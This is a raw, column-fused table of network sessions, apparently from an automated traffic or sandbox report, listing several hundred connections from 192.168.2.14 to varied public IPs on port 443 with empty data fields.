                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15729192.168.2.145882272.69.28.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15730192.168.2.145184268.55.225.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15731192.168.2.1444238207.209.220.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15732192.168.2.144368472.170.8.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15733192.168.2.1456348210.255.66.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15734192.168.2.145453662.34.53.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15735192.168.2.1456820125.53.126.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15736192.168.2.145055479.33.88.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15737192.168.2.145251476.228.146.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15738192.168.2.1436686154.20.224.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15739192.168.2.1434366163.251.45.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15740192.168.2.144630071.92.47.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15741192.168.2.1452170135.91.49.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15742192.168.2.143505269.163.142.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15743192.168.2.1459194218.10.205.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15744192.168.2.1446294155.187.115.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15745192.168.2.1456482175.83.145.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15746192.168.2.144950297.212.190.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15747192.168.2.1437360120.67.48.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15748192.168.2.143845676.67.139.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15749192.168.2.145327254.247.126.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15750192.168.2.1459134171.73.147.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15751192.168.2.1452700218.130.39.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15752192.168.2.144507842.210.34.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15753192.168.2.1436562120.68.126.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15754192.168.2.1433716188.62.39.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15755192.168.2.144509278.212.221.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15756192.168.2.144149273.65.86.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15757192.168.2.1433820137.227.242.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15758192.168.2.143727825.198.45.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15759192.168.2.144770863.177.243.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15760192.168.2.14558289.32.99.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15761192.168.2.1457322194.188.166.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15762192.168.2.145494249.74.143.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15763192.168.2.145659277.230.241.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15764192.168.2.1455320109.125.210.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15765192.168.2.14561882.124.161.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15766192.168.2.144255462.144.56.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15767192.168.2.1458242101.35.81.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15768192.168.2.1453852218.3.3.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15769192.168.2.14574285.51.176.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15770192.168.2.144707220.66.167.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15771192.168.2.1440144116.7.230.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15772192.168.2.1440448108.114.101.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15773192.168.2.1459610109.164.95.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15774192.168.2.1437236208.103.140.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15775192.168.2.1449584190.3.77.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15776192.168.2.1459960174.89.114.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15777192.168.2.1446090187.155.121.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15778192.168.2.1456386198.134.31.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15779192.168.2.1460946191.18.183.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15780192.168.2.144336078.0.3.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15781192.168.2.1460152222.79.183.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15782192.168.2.1437430210.213.150.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15783192.168.2.1452576177.234.240.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15784192.168.2.144588454.172.2.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15785192.168.2.144046245.161.87.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15786192.168.2.144076248.188.52.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15787192.168.2.144464023.142.95.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15788192.168.2.1433036102.155.50.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15789192.168.2.1457550189.146.179.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15790192.168.2.1434634129.44.177.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15791192.168.2.144992872.26.8.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15792192.168.2.1450548104.55.215.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15793192.168.2.1441722167.38.128.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15794192.168.2.144982898.25.184.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15795192.168.2.1437372163.18.143.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15796192.168.2.1456326192.245.251.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15797192.168.2.143794067.32.105.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15798192.168.2.1439582159.72.91.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15799192.168.2.145850053.118.252.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15800192.168.2.1459860177.150.182.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15801192.168.2.1445290188.165.184.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15802192.168.2.1438010208.109.233.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15803192.168.2.144034236.162.100.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15804192.168.2.143817675.2.168.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15805192.168.2.143859842.111.135.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15806192.168.2.1458878193.71.35.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15807192.168.2.145891653.125.187.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15808192.168.2.1453726101.57.162.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15809192.168.2.14513609.81.135.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15810192.168.2.1438392209.86.50.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15811192.168.2.1441682212.105.72.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15812192.168.2.1459396153.133.112.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15813192.168.2.1457680189.158.250.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15814192.168.2.1433512195.47.207.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15815192.168.2.146013039.229.1.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15816192.168.2.145222044.212.166.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15817192.168.2.144362819.106.194.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15818192.168.2.1445280130.152.123.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15819192.168.2.143751246.7.59.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15820192.168.2.1449420168.122.244.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15821192.168.2.1452616203.247.25.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15822192.168.2.1435492179.149.1.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15823192.168.2.1435648186.54.155.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15824192.168.2.1448314114.150.95.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15825192.168.2.1447184163.25.111.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15826192.168.2.1446166185.37.14.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15827192.168.2.143999888.26.111.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15828192.168.2.145590471.109.125.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15829192.168.2.1458488165.236.47.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15830192.168.2.144004468.98.154.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15831192.168.2.1451126221.34.0.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15832192.168.2.14605988.253.6.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15833192.168.2.146063642.209.78.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15834192.168.2.1452560162.151.168.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15835192.168.2.144186624.77.208.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15836192.168.2.1453288190.127.246.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15837192.168.2.1447910155.58.225.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15838192.168.2.144542891.155.129.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15839192.168.2.1443362204.174.195.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15840192.168.2.1444874206.46.44.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15841192.168.2.145562650.61.49.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15842192.168.2.1440956103.197.52.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15843192.168.2.1443994194.145.121.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15844192.168.2.144159485.251.121.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15845192.168.2.144071449.226.222.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15846192.168.2.1443006167.1.170.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15847192.168.2.1453586133.45.156.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15848192.168.2.143680445.134.207.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15849192.168.2.144770662.131.111.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15850192.168.2.1436904218.63.171.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15851192.168.2.1433104102.222.11.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15852192.168.2.1458390211.98.187.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15853192.168.2.143593694.185.136.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15854192.168.2.143811238.200.104.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15855192.168.2.1436104115.29.51.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15856192.168.2.143828235.210.79.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15857192.168.2.1432964119.118.248.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15858192.168.2.143429663.166.214.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15859192.168.2.1437992147.84.219.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15860192.168.2.144850637.30.149.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15861192.168.2.1436446189.193.36.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15862192.168.2.145583482.244.231.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15863192.168.2.143781271.187.15.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15864192.168.2.1453462171.47.246.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15865192.168.2.1440710167.7.218.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15866192.168.2.143920052.103.196.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15867192.168.2.1446958210.57.0.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15868192.168.2.1442064119.29.95.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15869192.168.2.1453676109.75.97.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15870192.168.2.1451386119.249.10.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15871192.168.2.14485029.150.182.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15872192.168.2.1458016150.254.29.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15873192.168.2.145603077.182.159.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15874192.168.2.144792434.236.83.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15875192.168.2.143663271.55.227.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15876192.168.2.1446730166.160.172.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15877192.168.2.145979839.89.101.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15878192.168.2.1451832150.81.209.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15879192.168.2.145974445.163.90.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15880192.168.2.143746435.213.147.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15881192.168.2.14520984.253.44.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15882192.168.2.1448326173.43.223.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15883192.168.2.1438130208.215.153.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15884192.168.2.1451814136.64.33.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15885192.168.2.145015835.230.88.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15886192.168.2.1441478211.109.184.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15887192.168.2.1447084144.40.149.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15888192.168.2.143617220.214.215.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15889192.168.2.1447704138.109.168.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15890192.168.2.1439228110.220.206.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15891192.168.2.1435614106.149.81.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15892192.168.2.1434654168.25.45.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15893192.168.2.145978823.151.95.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15894192.168.2.145501262.43.86.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15895192.168.2.1450442153.245.223.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15896192.168.2.144643638.63.119.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15897192.168.2.1438272120.58.244.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15898192.168.2.1459142144.227.55.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15899192.168.2.1456244167.79.88.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15900192.168.2.1452452182.37.190.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15901192.168.2.143738254.74.136.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15902192.168.2.1458208142.176.213.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15903192.168.2.1446052125.217.136.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15904192.168.2.145085440.236.25.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15905192.168.2.1444764177.118.203.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15906192.168.2.14407408.136.26.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15907192.168.2.143507654.23.131.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15908192.168.2.143278663.46.136.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15909192.168.2.1440610220.137.89.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15910192.168.2.1447602107.252.47.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15911192.168.2.1449352203.84.9.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15912192.168.2.144273673.16.229.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15913192.168.2.1448888212.153.183.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15914192.168.2.1457896189.249.152.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15915192.168.2.1449742195.183.159.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15916192.168.2.143924040.180.31.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15917192.168.2.1455802102.56.188.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15918192.168.2.1454828110.220.130.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15919192.168.2.1444942165.97.218.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15920192.168.2.1455148168.140.226.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15921192.168.2.1445474209.154.73.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15922192.168.2.1439164223.171.66.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15923192.168.2.1445876146.173.181.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15924192.168.2.1449342185.65.0.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15925192.168.2.143554850.25.246.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15926192.168.2.1448148218.37.123.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15927192.168.2.1447176187.214.193.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15928192.168.2.144392636.232.23.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15929192.168.2.143863220.82.109.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15930192.168.2.1434704190.50.100.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15931192.168.2.14556622.138.226.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15932192.168.2.143746650.98.247.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15933192.168.2.144062690.47.102.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15934192.168.2.143379462.168.152.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15935192.168.2.1450796197.236.248.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15936192.168.2.1459196128.218.210.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15937192.168.2.1434078204.20.18.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15938192.168.2.1443728149.8.106.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15939192.168.2.144775246.233.214.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15940192.168.2.1447194199.53.162.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
